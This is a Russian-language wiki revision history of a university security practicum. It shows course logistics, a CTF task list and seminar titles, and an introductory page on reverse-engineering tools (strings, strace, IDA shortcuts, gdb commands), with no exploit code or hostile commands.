Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/ROP]]

== Примечания ==
<references/>

Практикум на ЭВМ (2023)

2023-12-02T16:40:01Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ добавлен семинар в список

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/RoP]]

== Примечания ==
<references/>

Файл:2023 reverse tasks.zip

2023-11-02T16:39:51Z

WGH:

Практикум на ЭВМ (2023)

2023-11-02T14:47:43Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ правильный номер семинара (надеюсь)

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

== Примечания ==
<references/>

Практикум на ЭВМ (2023)

2023-11-02T14:36:03Z

WGH: /* Задания */ задания по реверсу (собственно архив прикреплю чуть позже)

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 7 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

== Примечания ==
<references/>

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2023-11-02T01:25:53Z

WGH: /* gdb */ info proc mappings

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA ==

Интерактивный дизассемблер и декомпилятор.

Версия IDA Free вполне подходит для наших задач, её можно [https://hex-rays.com/ida-free/ скачать с официального сайта]. Ссылки на скачивание могут не открываться из РФ, вот на всякий случай зеркала:

* https://course.secsem.ru/idafree83_linux.run
* https://course.secsem.ru/idafree83_windows.exe
* https://course.secsem.ru/idafree83_mac.app.zip

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== Режим дизассемблера ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)

==== Режим декомпилятора (Hex-Rays) ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.
* <code>info proc mappings</code> - показать карту памяти процесса

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:2023 reverse examples.zip]] (плюс сорцы).

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2023-10-31T19:32:10Z

WGH: /* IDA Pro */ IDA Free

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA ==

Интерактивный дизассемблер и декомпилятор.

Версия IDA Free вполне подходит для наших задач, её можно [https://hex-rays.com/ida-free/ скачать с официального сайта]. Ссылки на скачивание могут не открываться из РФ, вот на всякий случай зеркала:

* https://course.secsem.ru/idafree83_linux.run
* https://course.secsem.ru/idafree83_windows.exe
* https://course.secsem.ru/idafree83_mac.app.zip

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== Режим дизассемблера ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)

==== Режим декомпилятора (Hex-Rays) ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:2023 reverse examples.zip]] (плюс сорцы).

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2023-10-31T19:27:57Z

WGH: /* Шорткаты */

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== Режим дизассемблера ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)

==== Режим декомпилятора (Hex-Rays) ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:2023 reverse examples.zip]] (плюс сорцы).

Практикум на ЭВМ (2023)

2023-10-31T19:26:12Z

WGH: /* Материалы */ семинар по IDA и ко

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 31.10.2023 14:00)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 7 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

== Примечания ==
<references/>

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2023-10-31T19:25:58Z

WGH: /* IDA */ dead link

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
